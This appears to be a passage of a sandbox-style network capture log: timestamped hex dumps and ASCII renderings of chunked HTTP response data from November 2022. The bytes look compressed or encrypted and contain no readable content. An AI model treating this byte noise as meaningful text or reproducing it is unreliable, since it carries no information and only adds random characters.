                                                            2022-11-29 23:11:39 UTC168INData Raw: 32 30 30 30 0d 0a ee 32 94 03 86 df f7 72 32 bb 3b 52 96 97 d4 b4 c2 e8 ae dd 64 4e 6e c1 70 1a ef 22 e1 d8 46 78 6c 3d d5 9a 12 ae 0b af 79 0e 71 a5 00 71 e2 c3 e3 d4 7b 9c 1c df 30 94 8b 06 5b 67 0a 07 b6 c9 47 78 b9 37 8f 25 75 13 61 de 82 dc 35 79 8c d3 61 fd 96 6a 1f 08 bd 8f 42 82 55 14 0b ff 0a dc 4d fe a8 38 47 da a0 f3 29 43 5d 05 f0 81 b9 34 3f 94 ab 99 20 77 bb 7c 24 dc 1c 1c d1 44 ae a4 2d 44 c0 6b 9e c0 68 7b 2b 0a 1e 8d f1 7e 4a dc fd 57 d0 31 8f 99 fc a9 9d f3 9b 6d 05 d9 22 fc f6 da cd af 30 2b fc 10 23 58 b3 6e e0 95 d3 7a a3 1f 1b c0 cf 81 25 1b b2 fe 34 73 76 52 aa 73 70 62 12 2a 84 9e bd c6 f7 64 ab 94 f2 03 70 4d 8d c7 69 ac 3e 88 1f 58 f8 b0 ac 54 89 c3 cb 2b 40 8a ed fd ff 3d 70 c9 9d 6e e5 b7 57 5f 5f 19 1c 44 b3 ad a5 c4 f1 5e a0
                                                            Data Ascii: 20002r2;RdNnp"Fxl=yqq{0[gGx7%ua5yajBUM8G)C]4? w|$D-Dkh{+~JW1m"0+#Xnz%4svRspb*dpMi>XT+@=pnW__D^
                                                            2022-11-29 23:11:39 UTC176INData Raw: 18 68 13 25 48 9f
                                                            Data Ascii: h%H
                                                            2022-11-29 23:11:39 UTC176INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC176INData Raw: 32 30 30 30 0d 0a c7 95 5e 19 7d 09 47 28 56 98 74 56 24 e2 0d f6 e7 50 1b 2a d3 8e 9c 10 cd a3 e9 8c 78 5b 12 cd 27 aa af c2 0b 70 ee 62 07 bf 6c f1 1a 07 09 a8 c2 85 97 08 e0 21 ba f7 ed 26 84 a3 ef f3 39 02 e3 09 d9 70 86 9d 15 f5 71 f3 c5 bd 1e 2e c1 a6 52 75 68 93 ab 5a 79 67 1a 19 a8 41 be 82 eb 39 3b d8 34 76 e0 93 1d 7c ab 9f 92 b4 15 1e c4 f4 a0 35 0d b7 88 35 0d a6 5e 57 10 6b a2 7d 48 92 2e 84 8c 21 3a 92 f6 c0 35 59 3f 5f 14 1f 90 78 67 39 c0 94 b6 34 4e ca bd d7 eb 31 f6 d5 8a df ec 7a cc 21 45 30 b2 c6 53 06 6b ad 6b a6 41 8d ee 19 9b 4e 87 1e 24 4a 0c ad 07 5e 31 79 12 57 03 d8 7f b7 72 46 b3 f6 e1 34 7a c6 15 d5 f5 0d 02 62 75 b6 d2 63 c4 8c 8f b7 c4 c4 dd 40 90 16 3a ee 3e 93 18 a0 27 ba d6 1b 5e 0d d6 8f 08 e9 a2 f1 5a 4e d5 1e c7 b9 94
                                                            Data Ascii: 2000^}G(VtV$P*x['pbl!&9pq.RuhZygA9;4v|55^Wk}H.!:5Y?_xg94N1z!E0SkkAN$J^1yWrF4zbuc@:>'^ZN
                                                            2022-11-29 23:11:39 UTC184INData Raw: b2 b2 39 c4 79 32
                                                            Data Ascii: 9y2
                                                            2022-11-29 23:11:39 UTC184INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC184INData Raw: 31 66 66 38 0d 0a d2 36 4a 01 f4 7d 88 b8 d4 6a 65 fa de a7 a0 d7 0d d4 96 5f 5b 52 d1 0a b0 9d 5a 28 55 5e 1e 05 9a 7d 30 63 ad 09 02 61 4f cd b3 90 da 1c 7e 2c 01 c4 52 e4 f4 03 66 0e 81 91 23 d1 a9 df 50 68 0d 96 00 3e d5 6d 06 cb 5a 43 17 04 e0 f1 46 bf f2 fd ca 48 af 7c 1f 4c 3d 47 b3 97 78 e8 b3 c1 70 6f 0b 18 26 c5 3e bb fd 71 9c 78 26 53 8a b6 0e 10 20 ed 22 ec 35 65 92 1e 9a b9 38 c0 ee c6 58 ad 6d 6d c5 96 81 7e 49 40 24 67 11 13 08 47 98 15 1d b1 30 80 4c d7 a6 ef 60 07 4c 66 8c 2d 89 34 71 62 06 27 49 5c 9f b0 73 0a 96 29 2d 3f e9 16 1e 10 85 32 ad 8d b3 53 69 4c 5e 46 21 1c 1e f8 84 f5 f1 02 bc f2 01 21 43 2a a4 52 04 b8 a7 f7 9d f2 af 71 58 56 7e 93 e1 9f eb b7 6f de fe 81 9f 95 b0 70 f9 ce ab 77 3c 36 66 11 9a b3 2b e3 be 5e 79 9c 46 cd 0f
                                                            Data Ascii: 1ff86J}je_[RZ(U^}0caO~,Rf#Ph>mZCFH|L=Gxpo&>qx&S "5e8Xmm~I@$gG0L`Lf-4qb'I\s)-?2SiL^F!!C*RqXV~opw<6f+^yF
                                                            2022-11-29 23:11:39 UTC192INData Raw: 32 30 30 30 0d 0a
                                                            Data Ascii: 2000
                                                            2022-11-29 23:11:39 UTC192INData Raw: 3a a9 a7 88 33 1c de fa 4e ab ee 3e 5b 60 c6 32 df 98 a5 20 5a c9 33 03 65 c2 ad ef 71 20 9b 2b b0 f4 c0 b6 64 48 c4 94 c8 54 29 a3 60 47 1c a4 e4 65 5d a8 c0 a5 4f 63 10 7a b4 6b ea 4f a8 42 0e 36 1d 52 42 4a 32 33 23 17 50 43 3c c6 96 84 c6 e2 8b 7c 71 57 9b ec 7f c8 a4 2e b4 06 cc bc fc 61 a6 dd 3a 27 c8 8d 6d 60 24 a7 51 97 76 9a d1 17 6f dd 73 e3 71 40 d1 bb 52 8a 2d cb 2e 92 2a fb 0f 0d 7f 2a ee 90 07 0e 7d fd dc 2f 08 df ec a8 28 dc 1b ab 93 0b a4 bf 9f 92 b6 a8 28 eb b9 91 41 5a 91 3a c6 81 bc 11 4b cb db 37 e2 0c cc 4e 77 68 83 e9 9a 24 9e 0e 30 56 f1 48 19 12 af eb f7 60 33 e2 4f f0 42 41 06 71 10 90 ba 60 08 4f d0 c6 1d a0 72 58 5e ff 5f 5a a9 47 d4 db 03 40 a3 e2 60 f7 dd 40 34 e6 5e 50 95 28 39 1c a4 82 e4 d1 e5 b1 7a e6 3c 88 41 2a 4d a3 aa
                                                            Data Ascii: :3N>[`2 Z3eq +dHT)`Ge]OczkOB6RBJ23#PC<|qW.a:'m`$Qvosq@R-.**}/((AZ:K7Nwh$0VH`3OBAq`OrX^_ZG@`@4^P(9z<A*M
                                                            2022-11-29 23:11:39 UTC200INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC200INData Raw: 32 30 30 30 0d 0a 96 f4 4a 21 5a 2b 82 10 73 1b 89 a0 de de 83 61 b9 cb 95 79 d4 4c 0f ba 67 50 28 bc 38 c3 b2 53 c0 b6 32 87 8d 68 90 58 af 46 95 2c 5f 15 53 23 2e 9a 53 7a 5c c7 9d 4c 0f 19 17 13 8e 1b c8 03 be e4 1f c4 54 e7 3f 5d f6 7d a9 a8 cd e9 33 84 38 f4 37 ad 9c 67 f9 1f a6 d9 3f 7c 9a 34 c7 eb e3 25 72 06 e0 bf 85 92 d6 f9 cf 4b a4 99 06 1a cf 99 0a 18 1a 4e 5c af 86 f3 79 f5 03 9a 8c f0 0d 18 db 4f 03 2a 05 d9 45 ba c3 ef 33 93 31 fa 31 f9 a1 4c be 84 02 8d fb 09 59 61 98 53 c3 b9 47 1d 3f 91 b8 4c ae 03 b6 ab f5 c3 da cd 57 a4 ae 4c 94 7a f0 39 83 9d 6c 54 63 e1 42 8b 09 62 04 1b a4 e1 12 f6 83 1a e5 10 ce ce b7 35 6b 27 91 8f 9e 63 d3 6a 64 19 35 f5 fb 42 20 a5 96 7e 5c 2d 83 99 47 21 8f b2 1e 4d 30 ec 69 49 16 49 20 37 a0 f6 f2 d4 ee c6 34
                                                            Data Ascii: 2000J!Z+sayLgP(8S2hXF,_S#.Sz\LT?]}387g?|4%rKN\yO*E311LYaSG?LWLz9lTcBb5k'cjd5B ~\-G!M0iII 74
                                                            2022-11-29 23:11:39 UTC208INData Raw: 0b b1 92 e5 e9 51
                                                            Data Ascii: Q
                                                            2022-11-29 23:11:39 UTC208INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC208INData Raw: 32 30 30 30 0d 0a 91 7f 2f e8 cd 3f 9e ee 35 34 55 23 f6 4f 35 11 c4 46 d6 c7 b3 28 89 c9 e6 c1 38 f6 60 49 6f 51 fc 7a e6 27 f5 23 a5 a5 25 8c c4 10 98 eb f8 ae 6a 74 86 6c ad 59 0c b0 2e ea 7d 13 04 60 3f 2a 6d 31 2f 99 b1 51 6c cc 19 27 51 12 fa 64 ec 47 e3 a2 7d 7c 04 42 dc 48 4b 11 75 23 be 98 b5 a2 cb f0 a9 57 96 d3 84 79 e5 ed 2a 70 d4 b4 19 ad 25 aa e2 90 4a 09 57 97 ae 93 b5 b7 3d dd 61 da eb 29 cc 23 46 8e ed b4 6b 2a 48 17 23 2b af d6 4d 13 f0 57 f8 52 a1 c3 00 53 78 86 71 24 20 1c 91 c8 f5 97 0b 29 bf e4 de 22 25 13 f9 ca 8b ca 67 4b e6 4d ec ed 57 e5 4d 33 0f fb 21 d6 7f f5 70 42 e7 c3 5c a2 65 74 3f 8e c3 a2 81 97 8d 4d b7 6f 23 80 a8 62 12 93 b6 36 6e e3 5e d6 ac c4 ba bc 94 c1 17 ae ee 9e 4c f0 d1 35 9d 1a ff 05 a5 2e 3a bf 2b ea 44 11 d4
                                                            Data Ascii: 2000/?54U#O5F(8`IoQz'#%jtlY.}`?*m1/Ql'QdG}|BHKu#Wy*p%JW=a)#Fk*H#+MWRSxq$ )"%gKMWM3!pB\et?Mo#b6n^L5.:+D
                                                            2022-11-29 23:11:39 UTC216INData Raw: bf ef 7f 36 11 f7
                                                            Data Ascii: 6
                                                            2022-11-29 23:11:39 UTC216INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC216INData Raw: 32 30 30 30 0d 0a 8c 2e 9c 39 6a 35 a1 c6 cc 0f f3 b9 27 27 e9 98 22 83 26 d6 99 6a e7 9d 47 58 ab 07 b0 ee a0 e2 f6 91 9c 23 93 bb 87 5a 83 18 b7 c7 f4 38 b7 3e 9c 65 33 8a c7 5a 74 e4 e1 13 20 71 b2 c5 0a 91 85 5e d7 cf 21 fa 00 38 50 9d e7 27 44 b8 3d f8 22 9c 68 77 e1 ca 0f d6 be c3 94 11 09 c5 3a a9 51 dd 7c 15 5d 5b 3c f0 3a 4a da 7f c7 31 a4 74 f4 5c 54 79 a5 40 9c 21 a4 44 79 39 99 5e 3c 27 ca 60 fb 43 ae 55 83 5a f9 c7 87 25 d9 48 56 af 72 f8 51 f5 54 16 81 10 f4 c0 0a 26 91 33 af fc ad 75 51 33 11 74 f9 1b 00 a4 33 d4 50 ab 6a 76 e3 d2 a9 7a 23 50 8d 8b 83 cf d9 84 8d 8d 4a b7 48 d8 a3 cd c0 08 4b 2a 8f 78 99 d6 2e 4d 50 b3 14 91 b6 49 f8 76 62 09 ee e2 df b6 37 9e fa 0b 11 b9 d3 ab 4b ab 7d 6e 47 0d 5a 46 20 d4 94 a0 99 34 02 7b 1e 51 6f a0 bc
                                                            Data Ascii: 2000.9j5''"&jGX#Z8>e3Zt q^!8P'D="hw:Q|][<:J1t\Ty@!Dy9^<'`CUZ%HVrQT&3uQ3t3Pjvz#PJHK*x.MPIvb7K}nGZF 4{Qo
                                                            2022-11-29 23:11:39 UTC224INData Raw: d7 4b 69 66 fb 4d
                                                            Data Ascii: KifM
                                                            2022-11-29 23:11:39 UTC224INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC224INData Raw: 32 30 30 30 0d 0a c6 f5 a4 20 26 58 99 9c 35 13 e4 1c c7 39 b5 bb f8 9e 0d 11 92 f2 e9 76 6d ac 61 77 ff df 9e 52 16 ca 26 70 13 71 e9 5e 50 f6 20 d4 e8 ad b1 60 ff 79 ae b2 ce 27 9e bd 04 3c 19 ad 4f 58 fc d4 15 49 8d f3 02 1f fa f0 2d 01 de ef 3f d0 a1 44 11 76 73 3e 78 78 41 00 33 3f 7d 36 be 21 59 f1 65 ff fe b5 56 b6 5c 4f bc 95 27 be 73 00 53 5e ed d3 5b 29 4f 0d 25 c0 92 55 cd 3b 31 58 0a 86 6b 6b d6 ab 2b e8 8c 6a 60 49 78 34 3a 90 21 ce 41 5c 5e 2d ed e7 d4 75 29 75 ba 9d 4f 67 4d 35 f4 5e c6 74 61 51 1d 09 63 50 d2 69 c0 70 1b fc b6 0b 5d e1 c3 62 b3 1e 34 45 5b 3e 25 68 87 73 2c 50 58 94 c3 ca 27 86 27 98 fc 5d 69 98 fa b7 d3 2d ae ed b7 09 f2 80 4b 56 68 dd 5a de 68 56 ed 1d 4a f0 9e 81 e2 e4 69 ec c9 9e db be 88 af f0 da 87 8a 6c 7b 1a bb 79
                                                            Data Ascii: 2000 &X59vmawR&pq^P `y'<OXI-?Dvs>xxA3?}6!YeV\O'sS^[)O%U;1Xkk+j`Ix4:!A\^-u)uOgM5^taQcPip]b4E[>%hs,PX'']i-KVhZhVJil{y
                                                            2022-11-29 23:11:39 UTC232INData Raw: 88 50 2b 52 1c a4
                                                            Data Ascii: P+R
                                                            2022-11-29 23:11:39 UTC232INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC232INData Raw: 32 30 30 30 0d 0a 3b 36 1b d1 01 1d 8f 6c 74 f7 5a b2 1e ab 8d 88 9b 06 1f dd 80 58 c3 4f 3d 72 86 a8 22 2c ff aa 3b 06 0e 5a 92 67 ed 85 25 69 4c d7 ed 0f cb d1 16 fb 68 e1 09 54 c3 a7 20 b3 16 8b 7c ae 0b c9 94 37 aa 94 72 97 32 7d 07 07 96 45 2e 07 10 69 17 20 f8 f0 1b b5 81 dd 3c eb 31 f3 f3 e0 e7 a6 7f 25 86 a9 e1 67 01 30 a7 f8 05 d0 7b e9 b7 ca 74 3d 87 f3 0d 5b 89 32 4a 7c ea 00 a0 77 37 66 b2 4e 19 75 bb 85 18 ef b7 09 27 5a 4c 3c 95 7e b0 e7 91 a5 c6 23 ef 57 d0 ed 45 67 7e 0b 05 ae bb ee 3c cb 14 ad 32 73 71 ea 17 2f ba 46 46 62 87 78 1c 50 2c 06 0d ea ff 26 46 5d 63 d4 2a e3 33 ce e5 4f 02 80 47 43 a5 df 32 c8 29 61 0b 13 db 6f 86 85 fc 75 97 c1 52 a3 45 bc 8f 4b 3f d3 63 c9 39 e6 b1 b0 f5 64 55 cf 1d c2 92 37 ce e8 06 51 07 d8 2f 24 ef 35 33
                                                            Data Ascii: 2000;6ltZXO=r",;Zg%iLhT |7r2}E.i <1%g0{t=[2J|w7fNu'ZL<~#WEg~<2sq/FFbxP,&F]c*3OGC2)aouREK?c9dU7Q/$53
                                                            2022-11-29 23:11:39 UTC240INData Raw: bc 41 45 37 a7 2d
                                                            Data Ascii: AE7-
                                                            2022-11-29 23:11:39 UTC240INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC240INData Raw: 32 30 30 30 0d 0a db 70 2d 6c fe 14 21 ba 2f a6 8d fd 7a 45 0f 37 8b dd b7 9c 56 85 34 3f 83 1c f5 6b f0 a6 5f 86 fb 4a 9b e4 f2 88 1d b3 dd 68 8a 15 fd 13 4d af 06 e9 24 c0 05 45 0d c3 04 2b 54 4f 32 a3 9a e0 73 56 7c 40 0f 6b ea bd bd 3b 85 51 a7 a2 21 ad 5c 32 50 ae f8 b2 4a 02 83 b7 62 5a 6b ae b7 c0 7b 5a 48 19 57 c5 48 d3 6f c0 9c 1c 27 c3 6d 72 b1 3c a4 09 45 ed fb bb e0 f0 c6 77 63 c7 e4 c8 da 69 e4 eb ba 51 6f d3 eb e6 cb de 0f 72 77 18 6b 42 49 69 91 dd 0e 63 f5 44 6b 80 b7 81 c3 67 ff f2 e6 61 bd 13 e0 24 95 74 78 01 44 4f 89 cd 75 98 57 f7 89 81 a0 93 cf 45 73 1a d9 5a fa 72 3d 7d 99 3e 16 d8 30 e2 d4 d8 6d 72 63 c1 5a e8 6a 24 2d b7 f4 b5 8c 14 08 de 22 68 af 75 fd eb e7 fe 52 b1 11 11 46 35 5d bb 48 4a 57 a7 cc bf 62 12 65 26 8e 9d 0b 19 ac
                                                            Data Ascii: 2000p-l!/zE7V4?k_JhM$E+TO2sV|@k;Q!\2PJbZk{ZHWHo'mr<EwciQorwkBIicDkga$txDOuWEsZr=}>0mrcZj$-"huRF5]HJWbe&
                                                            2022-11-29 23:11:39 UTC248INData Raw: 88 b0 59 80 84 46
                                                            Data Ascii: YF
                                                            2022-11-29 23:11:39 UTC248INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC248INData Raw: 31 66 66 38 0d 0a 89 1c 70 c6 b7 95 fa f0 83 88 51 cd 1e d1 c6 40 f6 33 b6 b3 45 6e 21 01 72 ce 4b 8c 0f bc b2 93 e9 0e 5f d8 41 88 67 1c 71 20 ca 1e 6e a0 0d 58 62 42 d9 f2 0d e0 66 84 c0 46 30 9f 0b 02 57 a7 64 33 20 e8 e9 51 91 1a 63 c8 e7 c4 7b 36 d9 72 87 12 b5 dd 7f b8 f6 8a 25 f0 7c b7 3b 8a 59 0e da e0 29 eb bd aa 48 e2 e8 cd c2 65 63 3f 0c 5a 4c 12 68 b7 cd 23 1d 60 cd 42 2b 55 e0 17 e1 a5 4d 54 9b 4f 51 d0 60 f1 9f 3f e3 e8 a9 1c 52 f2 d4 2d a1 3a 9d e6 4f 62 77 2e a2 42 31 70 2d e4 7b ad 90 80 4e f9 c5 16 af 76 02 52 fc f6 dc a7 93 e3 17 c2 91 08 93 91 62 5b 70 11 e4 0a 26 56 54 ee e4 c7 0b ce d1 e4 9c 92 c5 92 6a 88 12 83 5c 47 78 13 81 82 4f cc d7 97 f2 0a 93 10 f0 cd 0d 63 e6 37 16 b9 5b 1d 0e 76 32 c1 7f bc cc 4e b2 aa 3b 50 f0 62 f8 1c fc
                                                            Data Ascii: 1ff8pQ@3En!rK_Agq nXbBfF0Wd3 Qc{6r%|;Y)Hec?ZLh#`B+UMTOQ`?R-:Obw.B1p-{NvRb[p&VTj\GxOc7[v2N;Pb
                                                            2022-11-29 23:11:39 UTC256INData Raw: 32 30 30 30 0d 0a
                                                            Data Ascii: 2000
                                                            2022-11-29 23:11:39 UTC256INData Raw: 48 2e f2 da 4c 32 8e 3e 53 46 8b 6b 97 8e f6 cb c8 2f 6b 40 83 8c 0e 08 a0 ef 41 27 d2 68 d6 f7 7a bf 75 6d 8a b2 d0 0d 2e 2d 1e b0 2b 9c 46 e2 07 76 8e d8 99 c7 40 67 1b 80 61 35 4f 92 bc ca d6 cd 8e 74 c9 b5 94 6e 04 4f ba a7 cc b8 55 c1 f3 7a 86 9b 6f 9e fe 18 ee 96 17 e1 c0 69 85 c0 c1 9c 99 2d e6 e9 18 2a 26 87 05 3c 82 f6 cd 91 55 9b 8a a0 e7 cf 70 3e 2b 28 f6 69 68 15 bf ba 5c e1 23 9e 71 33 30 1d a6 d7 a0 59 22 2f 12 45 42 86 c9 51 e6 9a 9c 00 d6 34 61 5c 87 50 20 a1 f2 1e 47 1d 45 2b a4 71 0d 41 16 98 db 2e cb 4d a6 94 6e 7b 33 e5 75 66 32 22 81 53 4a cb 27 4f ba b2 44 d9 a4 77 f8 d0 d8 f8 90 19 67 d7 66 d9 d6 31 75 7d 9f 81 99 d1 bb 5e 67 88 1c a9 28 64 ae 66 06 9f 24 7c f8 05 3f 7b d7 3d 62 4c 7c da f7 39 bb 94 a2 99 be 7c 66 e0 07 43 8f cf 88
                                                            Data Ascii: H.L2>SFk/k@A'hzum.-+Fv@ga5OtnOUzoi-*&<Up>+(ih\#q30Y"/EBQ4a\P GE+qA.Mn{3uf2"SJ'ODwgf1u}^g(df$|?{=bL|9|fC
                                                            2022-11-29 23:11:39 UTC264INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC264INData Raw: 32 30 30 30 0d 0a 2c cf ea d7 62 99 9b fb 19 7a 08 65 e2 62 21 e4 44 7f 23 f8 7f b5 12 87 c8 e6 c8 25 b9 b0 8c 5e b5 bf 50 74 f9 d6 b3 66 9b 4c 20 79 eb 6b bb 85 37 42 0f c9 05 62 b2 e2 36 f5 d3 d0 31 d1 d8 e9 6b fe 06 d0 fd b8 a9 38 31 15 83 b3 90 53 d9 2c 94 eb 25 73 d6 ee 40 22 aa 0a b6 40 ea 4f d9 45 c2 ff 49 81 5f 01 db 38 97 78 c0 8e c3 88 1d fe 15 0a 56 b9 4f dc a5 30 9f 1a 43 f7 53 d4 b0 b7 0b 61 0e 18 3c 77 d0 f2 96 fe 18 11 0f 28 37 75 7d ad 88 47 02 15 fa 75 cd d4 9e 76 c4 d0 ea a1 16 f3 46 6d 6c 9e ee 39 41 d0 37 e2 da 75 ac 0c 1f 19 b8 cd c7 40 a5 74 1b da e6 09 8a f8 0c 10 28 22 26 3d 5a 34 74 91 1d 6b 28 4d e7 f2 50 e1 de 14 d7 4b 28 2b b9 fa df cf ab e5 86 ce 08 01 5d bb 47 a7 ce 45 b9 b5 20 0a ce 56 e7 98 08 68 89 31 24 4a b3 25 a5 16 63
                                                            Data Ascii: 2000,bzeb!D#%^PtfL yk7Bb61k81S,%s@"@OEI_8xVO0CSa<w(7u}GuvFml9A7u@t("&=Z4tk(MPK(+]GE Vh1$J%c
                                                            2022-11-29 23:11:39 UTC272INData Raw: 46 80 64 76 b3 23
                                                            Data Ascii: Fdv#
                                                            2022-11-29 23:11:39 UTC272INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC272INData Raw: 32 30 30 30 0d 0a 75 e2 03 6a 22 9e 8a e9 50 73 6c e0 a7 75 34 d8 03 2d bd ad 50 8d 07 97 c9 30 96 10 ec 1d 93 fd 07 4f f9 a6 a1 45 70 0e 57 be 33 04 b3 25 53 28 f5 f1 a4 c3 bf 31 e4 09 cc a1 49 45 33 eb 54 d4 0e 65 8f 6c a2 af 5d 2d c2 8f 14 f4 64 00 85 f3 f7 84 38 2b 70 e3 b1 a9 52 32 df 18 d7 77 ae 91 8b f1 38 a1 84 a1 c5 76 05 f0 8f 5e 15 2a 17 0f f4 26 08 81 cb ad c0 a8 1c d6 86 77 fe bc a3 70 5c f0 7b eb e9 82 c1 4f 6a cb a2 26 d3 25 de 1f aa 72 39 e3 4f 36 31 8f 90 79 65 40 36 71 e1 c7 8e ae 43 6b 0a 2c a9 6c 56 e7 17 c4 1b 8c 25 8a d0 95 bb bb 04 ca 2c 69 d3 c9 ca 4b e8 d4 18 fb 52 1b 69 63 79 10 76 84 b1 78 cf cf 0d a4 17 84 17 6c 26 a6 46 9a ad fd 5b c5 87 cc 3f d3 f4 27 28 65 dc 23 ea a0 07 63 6c 13 e0 61 8c 47 c0 2a 14 43 14 a3 0f 67 4e e5 9a
                                                            Data Ascii: 2000uj"Pslu4-P0OEpW3%S(1IE3Tel]-d8+pR2w8v^*&wp\{Oj&%r9O61ye@6qCk,lV%,iKRicyvxl&F[?'(e#claG*CgN
                                                            2022-11-29 23:11:39 UTC280INData Raw: 3a 80 02 04 02 57
                                                            Data Ascii: :W
                                                            2022-11-29 23:11:39 UTC280INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC280INData Raw: 32 30 30 30 0d 0a 55 20 fa 3c 64 1f db ca 61 34 45 df e2 55 c8 fc 75 bc 36 7c 36 96 73 95 aa d8 99 3f a0 ce 8b 87 45 b8 fc af 1a b7 02 6c 34 3d 04 c9 89 dc f3 dc 25 e7 c3 d4 2e f1 ca 90 8d 7e 9a 11 1b 6d f9 3b 25 b3 20 12 84 64 92 2c 7d a8 a5 6b 53 78 58 60 a4 20 29 43 89 61 04 ae 31 c3 f4 e7 49 6c c4 a2 77 7b 50 65 1e 5b f0 46 f7 37 26 b7 7c 4a c1 71 b9 d8 6f 3e 23 b3 f4 5f bc 44 90 71 b0 90 1b 67 13 bf 7e ec 13 0b de 69 1f aa cb d5 a8 99 dd 93 8f 4d aa f4 25 0c e8 71 7c 99 8b 95 1e 08 d0 94 ba 4a 7c b2 97 de 94 ad 36 d3 3f 00 8a 30 c9 ac bf 79 68 c7 58 19 79 4b 57 5b 7a bf 5a ae 7d 9e 54 27 99 ac f2 e4 ca 63 18 b2 ce cc d5 73 39 e1 45 2c ce 4a 06 2d 55 08 a8 31 28 25 ee 19 2c 38 96 62 be 61 1f 5f 6e c9 8c 43 94 10 ce 12 39 30 44 2b 25 5c b3 5e f6 66 48
                                                            Data Ascii: 2000U <da4EUu6|6s?El4=%.~m;% d,}kSxX` )Ca1Ilw{Pe[F7&|Jqo>#_Dqg~iM%q|J|6?0yhXyKW[zZ}T'cs9E,J-U1(%,8ba_nC90D+%\^fH
                                                            2022-11-29 23:11:39 UTC288INData Raw: 37 29 60 5d 0e a2
                                                            Data Ascii: 7)`]
                                                            2022-11-29 23:11:39 UTC288INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC288INData Raw: 32 30 30 30 0d 0a 84 bc 64 0e a5 b7 ee 79 0a 51 0d d7 7a 56 56 b5 0e 2d 7e ea 44 b2 27 c8 b1 f0 32 87 4e 5e 21 a0 db 18 ca 24 88 97 6e 79 5d 11 4a 3a c6 14 db f5 dd 24 d7 91 77 d2 55 2a 68 f1 c0 2f d5 7f d0 5e db 3f d9 f2 c3 da 9e dc 69 06 1b 26 10 9c 92 d4 dc b3 63 11 11 42 53 0b 9c 56 8b dd 11 1b a9 58 34 3d f8 48 92 46 69 e7 e2 18 0e ae 43 8c ca 2d 69 7f 61 de f2 99 88 dd 51 c9 e7 15 5c 81 ba e9 67 40 4a 66 e9 ec a8 03 da e2 b7 71 5c 96 79 98 bb fe cb c0 75 fd 53 ec 40 54 fe ff 01 6a 4d 2f 34 18 ae c4 18 75 92 e8 83 eb 4c ad 00 69 66 04 a6 c2 3a 68 72 29 6f c1 1b c6 4b 38 d9 f0 40 a8 cf 6b 88 98 94 4a 5f a7 3b 2b 51 a0 a6 e6 fa 4a da d8 96 5f c6 0e 93 29 1c 5f 9c ee 1b 51 93 b3 b8 1a fc fa 9e 36 45 e3 7c 41 5a 6a 8b 78 60 8f 4a eb 60 e4 b6 33 5e ce 44
                                                            Data Ascii: 2000dyQzVV-~D'2N^!$ny]J:$wU*h/^?i&cBSVX4=HFiC-iaQ\g@Jfq\yuS@TjM/4uLif:hr)oK8@kJ_;+QJ_)_Q6E|AZjx`J`3^D
                                                            2022-11-29 23:11:39 UTC296INData Raw: f8 e7 39 d2 45 c9
                                                            Data Ascii: 9E
                                                            2022-11-29 23:11:39 UTC296INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC296INData Raw: 32 30 30 30 0d 0a a5 1a 06 71 cd c8 7b 66 22 81 35 37 a0 df 73 54 4b 90 e2 b5 31 90 ee 67 91 e4 50 88 9f 40 4f 8e 4e 3d 00 e4 2b d7 a4 b0 64 b1 ff e4 59 27 44 f9 39 8d 26 b9 d8 41 bb ba 74 82 fb d1 7a 60 ad fa 2c 47 bb eb 3b 6a 4e f5 72 2f f8 38 ba 06 10 bf 55 98 42 08 5d 2d 30 4c d1 2c b0 07 7e 14 ad 39 fa 1c fb 7d 8a e5 3e 6e 1f 4b c2 27 06 3f 2c 39 fb 3c 88 c5 f1 d9 45 75 67 12 14 24 2e ee 80 6c 71 c8 7c 32 1b 7e 62 f8 b2 91 07 58 c3 91 a0 48 33 1d 6b ae 59 96 ee 68 f0 70 e2 17 44 a9 6b c5 e6 3d 01 72 c3 a4 37 98 35 09 e2 87 15 6e 46 41 ef 23 86 56 ad 0f 67 9a 93 d1 d5 39 33 95 d3 3b e4 c3 2d fa d8 35 4c 3d 8a 39 e9 a6 20 35 0e f4 4e 52 e8 40 f0 ce a3 a2 f0 80 85 d1 f7 49 42 ae 03 48 ce 44 49 17 57 e6 4b e8 83 ae 7c a9 7a 78 ce 86 f6 40 91 67 83 9b 1e
                                                            Data Ascii: 2000q{f"57sTK1gP@ON=+dY'D9&Atz`,G;jNr/8UB]-0L,~9}>nK'?,9<Eug$.lq|2~bXH3kYhpDk=r75nFA#Vg93;-5L=9 5NR@IBHDIWK|zx@g
                                                            2022-11-29 23:11:39 UTC304INData Raw: 75 39 5e 59 7c c3
                                                            Data Ascii: u9^Y|
                                                            2022-11-29 23:11:39 UTC304INData Raw: 0d 0a
                                                            Data Ascii:
